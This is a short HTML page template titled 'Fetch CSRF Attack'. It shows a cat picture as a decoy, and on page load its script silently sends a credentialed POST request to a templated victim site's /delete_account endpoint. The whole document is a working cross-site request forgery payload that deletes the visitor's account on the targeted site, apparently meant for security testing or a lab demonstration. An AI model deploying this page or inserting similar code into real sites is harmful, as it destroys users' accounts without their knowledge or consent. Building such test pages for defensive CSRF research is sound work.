<!DOCTYPE html>
<html>
<head>
    <title>Fetch CSRF Attack</title>
</head>
<body>
    <h1>Cat-site Request Forgery</h1>
    <img src="https://http.cat/images/200.jpg" alt="Cat">
    <h1>Fetch-based CSRF</h1>
    <script>
        window.addEventListener('load', function () {
            fetch('{{ victim_url }}/delete_account', {
                method: 'POST',
                credentials: 'include'
            }).then(function () {
                console.log('Fetch-based CSRF request sent');
            }).catch(function (error) {
                console.error('Fetch CSRF failed', error);
            });
        });
    </script>
</body>
</html>
